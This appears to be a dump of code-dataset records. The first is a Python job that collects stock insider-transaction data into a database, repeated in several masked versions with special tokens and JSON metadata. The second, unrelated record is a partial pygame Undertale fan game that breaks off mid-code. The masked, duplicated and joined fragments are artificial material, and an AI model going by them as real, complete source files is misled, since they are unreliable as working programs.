self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7 - now.weekday())
tomorrow = datetime(year=next_trading.year, month=
next_trading.month, day=next_trading.day, hour=16,
minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.
month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
def _log(self, msg, level='info'):
pass
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7 - now.weekday())
tomorrow = datetime(year=next_trading.year, month=
next_trading.month, day=next_trading.day, hour=16,
minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.
month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
if __name__ == '__main__':
FintelInsiderAcquisition(datetime.now()).start()
<|reserved_special_token_1|>
from datetime import datetime, timedelta
from request.insider_networking import InsiderTransactions
from db import FinanceDB
from acquisition.symbol.financial_symbols import Financial_Symbols
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
def _log(self, msg, level='info'):
pass
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7 - now.weekday())
tomorrow = datetime(year=next_trading.year, month=
next_trading.month, day=next_trading.day, hour=16,
minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.
day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.
month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
if __name__ == '__main__':
FintelInsiderAcquisition(datetime.now()).start()
<|reserved_special_token_1|>
from datetime import datetime, timedelta
from request.insider_networking import InsiderTransactions
from db import FinanceDB
from acquisition.symbol.financial_symbols import Financial_Symbols
class FintelInsiderAcquisition():
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
def _log(self, msg, level='info'):
pass
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({"trading_date": str(self.trading_date.date())}, {"symbol": 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({"trading_date": str(self.trading_date.date())}, {"symbol": 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.not_found))
# incomplete = len(self.get_incomplete_insider_tasks())
# complete = len(self.get_complete_insider_tasks())
# self._log('{}/{} complete/incomplete'.format(complete, incomplete))
def sleep_time(self):
now = datetime.now()
if self.found + self.not_found == 0:
if now.weekday() > 4:
next_trading = now + timedelta(days=7-now.weekday())
tomorrow = datetime(year=next_trading.year, month=next_trading.month, day=next_trading.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
elif now.weekday() <= 4 and now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
return 900
elif self.found == 0 and self.not_found > 0:
if now.hour < 16:
later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)
return (later - now).total_seconds()
else:
tomorrow = now + timedelta(days=1)
tomorrow = datetime(year=tomorrow.year, month=tomorrow.month, day=tomorrow.day, hour=16, minute=0, second=0)
return (tomorrow - now).total_seconds()
else:
return 900
if __name__ == "__main__":
FintelInsiderAcquisition(datetime.now()).start()
|
flexible
|
{
"blob_id": "08b13069020696d59028003a11b0ff06014a4c68",
"index": 3779,
"step-1": "<mask token>\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n <mask token>\n <mask token>\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n <mask token>\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 0:\n if now.weekday() > 4:\n next_trading = now + timedelta(days=7 - now.weekday())\n tomorrow = datetime(year=next_trading.year, month=\n next_trading.month, day=next_trading.day, hour=16,\n minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.\n month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n\n def _log(self, msg, level='info'):\n pass\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 0:\n if now.weekday() > 4:\n next_trading = now + timedelta(days=7 - now.weekday())\n tomorrow = datetime(year=next_trading.year, month=\n next_trading.month, day=next_trading.day, hour=16,\n minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.\n month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\n\nif __name__ == '__main__':\n FintelInsiderAcquisition(datetime.now()).start()\n",
"step-4": "from datetime import datetime, timedelta\nfrom request.insider_networking import InsiderTransactions\nfrom db import FinanceDB\nfrom acquisition.symbol.financial_symbols import Financial_Symbols\n\n\nclass FintelInsiderAcquisition:\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n\n def _log(self, msg, level='info'):\n pass\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\n 'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.\n trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching\n =True)\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n self._log('{}/{} found/not_found'.format(self.found, self.\n not_found))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 0:\n if now.weekday() > 4:\n next_trading = now + timedelta(days=7 - now.weekday())\n tomorrow = datetime(year=next_trading.year, month=\n next_trading.month, day=next_trading.day, hour=16,\n minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.\n day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.\n month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\n\nif __name__ == '__main__':\n FintelInsiderAcquisition(datetime.now()).start()\n",
"step-5": "from datetime import datetime, timedelta\n\nfrom request.insider_networking import InsiderTransactions\nfrom db import FinanceDB\nfrom acquisition.symbol.financial_symbols import Financial_Symbols\n\nclass FintelInsiderAcquisition():\n\n def __init__(self, trading_date=None):\n self.task_name = 'FintelInsiderAcquisition'\n self.trading_date = trading_date\n self.symbols = Financial_Symbols.get_all()\n self.finance_db = None\n self._reset_counters()\n\n def _reset_counters(self):\n self.found = 0\n self.not_found = 0\n self.symbols = Financial_Symbols.get_all()\n\n def _log(self, msg, level='info'):\n pass\n\n def get_incomplete_insider_tasks(self):\n if not self.finance_db or not self.trading_date:\n return []\n found = set(list(map(lambda x: x['symbol'], self.finance_db.find({\"trading_date\": str(self.trading_date.date())}, {\"symbol\": 1}))))\n return list(set(self.symbols) - found)\n\n def get_complete_insider_tasks(self):\n symbols = []\n if not self.finance_db or not self.trading_date:\n return symbols\n found = set(map(lambda x: x['symbol'], list(self.finance_db.find({\"trading_date\": str(self.trading_date.date())}, {\"symbol\": 1}))))\n return list(found)\n\n def start(self):\n self._reset_counters()\n if self.trading_date.weekday() > 4:\n self._log('Not running {} on weekend'.format(self.task_name))\n elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:\n self._log('Trading day has not finished yet, {}'.format(self.trading_date.time()))\n else:\n self.finance_db = FinanceDB('stock_insider')\n incomplete = self.get_incomplete_insider_tasks()\n insider_transactions = InsiderTransactions(incomplete, batching=True)\n\n for insider_data in insider_transactions.generate():\n documents = []\n for symbol, data in insider_data.items():\n if data:\n data['trading_date'] = str(self.trading_date.date())\n data['symbol'] = symbol\n documents.append(data)\n self.found += 1\n else:\n self.not_found += 1\n if documents:\n self.finance_db.insert_many(documents)\n\n self._log('{}/{} found/not_found'.format(self.found, self.not_found))\n # incomplete = len(self.get_incomplete_insider_tasks())\n # complete = len(self.get_complete_insider_tasks())\n # self._log('{}/{} complete/incomplete'.format(complete, incomplete))\n\n def sleep_time(self):\n now = datetime.now()\n if self.found + self.not_found == 0:\n if now.weekday() > 4:\n next_trading = now + timedelta(days=7-now.weekday())\n tomorrow = datetime(year=next_trading.year, month=next_trading.month, day=next_trading.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n elif now.weekday() <= 4 and now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n return 900\n elif self.found == 0 and self.not_found > 0:\n if now.hour < 16:\n later = datetime(year=now.year, month=now.month, day=now.day, hour=16, minute=0, second=0)\n return (later - now).total_seconds()\n else:\n tomorrow = now + timedelta(days=1)\n tomorrow = datetime(year=tomorrow.year, month=tomorrow.month, day=tomorrow.day, hour=16, minute=0, second=0)\n return (tomorrow - now).total_seconds()\n else:\n return 900\n\nif __name__ == \"__main__\":\n FintelInsiderAcquisition(datetime.now()).start()",
"step-ids": [
5,
7,
9,
10,
11
]
}
|
[
5,
7,
9,
10,
11
] |
import pygame
import time as time_
import random
import os
from pygame.locals import *
from math import sin, cos, pi
from sys import exit
# ---------------------------
from unzip import *
unzip()
# ---------------------------
from others import *
from gaster_blaster import *
from board import *
from bone import *
from sans import *
from player import *
from functions import *
# ----------------------------------------------------------------
'''初始化'''
os.environ["SDL_VIDEO_WINDOW_POS"] = "100,100"
pygame.init()
if FULL_SCREEN:
display = pygame.display.set_mode((1920, 1080), FULLSCREEN)
else:
display = pygame.display.set_mode(SCREEN_SIZE)
screen = pygame.Surface(SCREEN_SIZE).convert_alpha()
mask_surface_blue = pygame.Surface(SCREEN_SIZE).convert_alpha() # 蓝色攻击的mask
mask_surface_orange = pygame.Surface(SCREEN_SIZE).convert_alpha() # 橙色攻击的mask
mask_surface_normal = pygame.Surface(SCREEN_SIZE).convert_alpha() # 普通攻击的mask
pygame.display.set_caption("UPPERTALE") #标题
pygame.display.set_icon(pygame.image.load("res/icon-32.png")) #图标
fps = pygame.time.Clock() # 帧数计时器
frames = 60
# -----------------------------------
'''因为需要修改全局变量
所以不得不写在主文件里的函数'''
def players_turn(text):
def tmp():
global is_players_turn, battle_text, shown_index
is_players_turn = True
battle_text = text
shown_index = 0
bones.clear()
blasters.clear()
boards.clear()
attacks.append(tmp)
def set_turn_time(time):
def next_turn(screen):
global stop
stop = False
tasks.append(Task(next_turn, time))
def add_attack(func):
attacks.append(func)
return func
def shake(screen):
global screen_shaking
screen_shaking = True
def unshake(screen):
global screen_shaking
screen_shaking = False
def set_screen_angle(angle):
global screen_angle
screen_angle = angle
def start_testing():
attacks.clear()
# -------------------------------------
'''回合'''
# 吟唱
@add_attack
def yinchang_1():
global BOX_POS, BOX_SIZE
BOX_POS = [230, 230]
BOX_SIZE = [170, 160]
if DEBUG:
# 测试区开始
pass
# 测试区结束
sans.say("准备好了?")
# 开头杀
@add_attack
def first_round1():
set_turn_time(50)
sans.hand_direction = DOWN
player.type = BLUE_SOUL
player.direction = DOWN
player.falling_speed = 10
player.falling = True
tasks.append(Task(shake,
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
tasks.append(Task(unshake,
((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):
bones.append(
Bone(
pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7],
speed=[0, -5],
direction=UP,
time1=8,
time2=40,
length=1000,
type_=1
)
)
bones.append(
Bone(
pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],
speed=[0, 0],
direction=UP,
time1=200,
time2=48,
length=1000,
type_=1
)
)
bones.append(
Bone(
pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47],
speed=[0, 5],
direction=UP,
time1=8,
time2=248,
length=1000,
type_=1
)
)
@add_attack
def first_round2():
set_turn_time(50)
sans.hand_direction = LEFT
player.type = BLUE_SOUL
player.direction = LEFT
player.falling_speed = 10
player.falling = True
tasks.append(Task(shake,
(player.pos[0] - BOX_POS[0]) // 10))
tasks.append(Task(unshake,
((player.pos[0] - BOX_POS[0]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(player.pos[0] - BOX_POS[0]) // 10))
for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):
bones.append(
Bone(
pos=[BOX_POS[0] - 7, y],
speed=[0, 0, 5],
direction=LEFT,
time1=8,
time2=30,
length=0,
type_=2
)
)
bones.append(
Bone(
pos=[BOX_POS[0] - 7, y],
speed=[0, 0, 0],
direction=LEFT,
time1=150,
time2=38,
length=40,
type_=2
)
)
bones.append(
Bone(
pos=[BOX_POS[0] - 7, y],
speed=[0, 0, -5],
direction=LEFT,
time1=8,
time2=188,
length=40,
type_=2
)
)
@add_attack
def first_round3():
set_turn_time(450)
player.type = RED_SOUL
for _ in range(0, 300, 2):
bones.append(
Bone(
pos=BOX_POS,
length=40 + sin(_ / 20) * 40,
direction=UP,
speed=[7, 0],
time1=1000,
time2=_,
)
)
bones.append(
Bone(
pos=[BOX_POS[0], BOX_POS[1] + 25 + (sin(_ / 20) * 40) + 60],
length=1000,
direction=UP,
speed=[7, 0],
time1=1000,
time2=_,
)
)
@add_attack
def first_round4():
sans.headtype = SANS_LOOK_LEFT
sans.say("只是第一个回合而已,何必用尽全力?")
@add_attack
def first_round5():
set_turn_time(1)
sans.headtype = SANS_NORMAL
pygame.mixer.music.play(-1)
players_turn("* ...")
@add_attack
def zjj_1():
set_turn_time(60)
global BOX_POS, BOX_SIZE
BOX_POS = [200, 230]
BOX_SIZE = [200, 150]
sans.hand_direction = DOWN
player.type = BLUE_SOUL
player.direction = DOWN
player.falling_speed = 10
tasks.append(Task(shake,
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
tasks.append(Task(unshake,
((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
@add_attack
def zjj_2():
set_turn_time(11 * 100)
def zjj(screen):
angle = random.randint(240, 300)
blasters.append(GasterBlaster(
pos=[
player.pos[0] + math.cos(math.radians(angle)) * 200,
player.pos[1] + math.sin(math.radians(angle)) * 200],
angle=angle - 180,
time1=10,
time2=30,
width=30,
color=BLUE
))
for _ in range(10):
tasks.append(Task(zjj, _ * 100))
bones.append(
Bone(
pos=[BOX_POS[0] - 20, BOX_POS[1] - 8],
length=BOX_SIZE[1] - 30 - 16,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[2, 0],
type_=2
))
bones.append(
Bone(
pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1] - 8],
length=BOX_SIZE[1] - 30 - 16,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[-2, 0],
type_=2
))
bones.append(
Bone(
pos=[BOX_POS[0] - 20, BOX_POS[1] + BOX_SIZE[1] - 10 - 8],
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[2, 0],
type_=1
))
bones.append(
Bone(
pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1] + BOX_SIZE[1] - 10 - 8],
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[-2, 0],
type_=1
))
players_turn("* ...")
@add_attack
def blue_bone():
set_turn_time(700)
global BOX_POS, BOX_SIZE
BOX_POS = [150, 250]
BOX_SIZE = [350, 120]
sans.hand_direction = DOWN
player.type = BLUE_SOUL
player.direction = DOWN
player.falling_speed = 10
tasks.append(Task(shake,
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
tasks.append(Task(unshake,
((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
for _ in range(10):
bones.append(
Bone(
pos=[BOX_POS[0], BOX_POS[1] - 8],
length=BOX_SIZE[1] - 30 - 16,
direction=DOWN,
time1=1000,
time2=_ * 60 + 60,
speed=[4, 0],
type_=2
))
bones.append(
Bone(
pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - 8],
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 60 + 60,
speed=[4, 0],
type_=1
))
bones.append(
Bone(
pos=BOX_POS,
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 60 + 60 + 16,
speed=[4, 0],
type_=1,
color=BLUE
))
@add_attack
def orange_bone():
def start_spinning(screen):
global spinning_left
spinning_left = True
def stop_spinning(screen):
global spinning_left
spinning_left = False
tasks.append(Task(start_spinning, 0))
tasks.append(Task(stop_spinning, 180))
tasks.append(Task(lambda screen:set_screen_angle(180), 181))
tasks.append(Task(start_spinning, 520))
tasks.append(Task(stop_spinning, 700))
tasks.append(Task(lambda screen:set_screen_angle(0), 701))
set_turn_time(700)
sans.hand_direction = UP
player.type = BLUE_SOUL
player.direction = UP
player.falling_speed = 10
tasks.append(Task(shake,
(player.pos[1] - BOX_POS[1]) // 10))
tasks.append(Task(unshake,
((player.pos[1] - BOX_POS[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
for _ in range(10):
bones.append(
Bone(
